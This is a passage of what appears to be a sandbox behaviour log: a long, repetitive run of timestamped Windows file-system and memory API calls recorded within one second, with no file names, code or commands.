{"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,260", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,260", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,270", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,270", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,280", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,280", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,290", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,290", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,300", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:40,300", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,300", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,300", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,310", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,310", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,320", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:40,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,320", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,330", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,330", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,330", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,340", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,350", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,350", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,370", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:40,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,400", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,420", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,420", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,430", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:40,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,450", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,450", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:40,450", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,450", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,460", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,460", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,470", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,470", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,480", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,480", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,490", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,490", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,500", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,500", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,510", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,510", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,510", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,520", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,520", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,530", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,530", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,540", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,540", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,550", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,550", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:40,550", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,550", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,560", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,560", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,570", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,570", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:40,580", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,580", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,580", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", 
